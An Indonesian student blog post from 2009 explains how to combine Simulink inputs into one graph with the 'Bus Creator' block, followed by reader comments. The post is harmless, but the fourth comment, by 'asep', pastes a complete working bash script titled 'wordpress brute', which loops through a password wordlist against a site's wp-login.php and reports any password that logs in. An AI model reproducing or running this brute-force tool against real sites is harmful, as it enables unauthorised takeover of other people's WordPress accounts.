ss_blog_claim=34b0f86655351bd981f4d411f59dc214

Tugas Simulink

June 24, 2009 by
Filed under: MST-TIKM 

Sebenarnya hanya butuh “Bus Creator” saja untuk menggabungkan beberapa masukan manjadi satu grafik. “Bus Creator” tersebut gunanya sebagai penghubung, adanya di ‘commonly used blocks’. Tinggal di seret aja tuh dari daftar tabel sebelah kiri dan tarok di sebelah kanan. Terus di kasih penghubung seperti biasa, setelah tersambung nanti akan secara otomatis mambaca semua inputnya.

Supaya lebih jelas gambarnya diklik aja, nanti akan keluar tuh gambar yang jelasnya. Dari gambar dibawah sudah terlihatkan caranya. Grafik yang dibawah adalah hasil dari bagan tersebut. Nah terus tinggal di print screen, masukin ke word terus di print deh. Atau bisa juga langsung di print kok. Okeh, semoga membantu. :D
Btw ini tugas belum tentu benar loh, tapi sih kayaknya emang gini caranya. Dan jangan lupa mengganti angka2 atau variable-nya ya.

simulink matlab

simulink matlab

[ Klik gambar diatas untuk lebih jelasnya ]

Random Posts

Comments

4 Comments on Tugas Simulink

  1. suryo on Wed, 24th Jun 2009 20:13
  2. thank U broo

  3. naknus on Mon, 6th Jul 2009 16:57
  4. thanks artikelnya ya..
    nambah ilmu

  5. Nafi' Abdul Hakim on Thu, 9th Jul 2009 20:40
  6. hehehehehe..
    aku makin bingung sama artikel diatas..
    hehehehe..
    bingung apa maksudnya..
    maaf

  7. asep on Tue, 19th Jan 2010 11:11
  8. #!/usr/bin/env bash
    # wordpress brute, v0.2

    echo “wordpress login cracker”
    echo
    echo “enter website with full path to wordpress:
    “; read site
    echo -n “enter wordpress user
    “; read user
    echo -n “enter wordlist path
    “; read wlpath

    n=`cat “$wlpath” | wc -l`
    for (( i=1; i <= $n; i++));
    do
    #default user is admin
    password=`sed -n “$i”p “$wlpath”`
    b=`echo “log=$user&pwd=$password&wp-submit=Log+In&redirect_to=wp-admin” | lynx -dump -nolist -post_data “”$site”/wp-login.php” | grep ERROR`

    echo trying user $user with password $password

    if [ -z "$b" ]
    then

    echo “SUCCESS: “$site” password is: “$password”"
    echo “have fun…”
    exit 0
    fi
    done
    echo
    echo “brute force complete”
    echo “no password found :(”

Tell me what you're thinking...
and oh, if you want a pic to show with your comment, go get a gravatar!





Readers who viewed this page, also viewed: